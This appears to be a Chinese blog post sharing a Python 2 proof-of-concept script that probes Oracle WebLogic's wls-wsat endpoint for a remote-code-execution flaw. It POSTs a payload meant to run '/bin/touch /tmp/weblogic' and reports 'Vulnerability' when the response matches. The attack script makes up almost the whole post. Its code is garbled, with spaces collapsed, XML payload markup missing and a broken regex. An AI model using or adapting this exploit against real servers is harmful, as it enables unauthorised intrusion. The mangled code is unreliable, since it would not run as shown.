poc weblogic 漏洞利用_Weblogic wls RCE 漏洞验证POC

#!/usr/bin/env python#coding:utf-8#@Date : 2017/12/22 17:11#@File : weblogic_poc.py#@Author : sevck#@Link : http://www.qingteng.cn#-------------------------------------------------------------------------

importrequestsimportrefrom sys importargv

heads={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3','Content-Type': 'text/xml;charset=UTF-8'}defpoc(url):if not url.startswith("http"):

url= "http://" +urlif "/" inurl:

url+= '/wls-wsat/CoordinatorPortType'post_str= '''

/bin/touch

/tmp/weblogic

'''

try:

response= requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)

response=response.text

response= re.search(r"\.*\", response).group(0)exceptException, e:

response= ""

if 'java.lang.ProcessBuilder' in response or "0" inresponse:

result= "Vulnerability"

returnresultelse:

result= "No Vulnerability"

returnresultif __name__ == '__main__':if len(argv) == 1:print "python weblogic_poc.py url:port"exit(0)else:

url= argv[1]

result= poc(url=url)print result

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值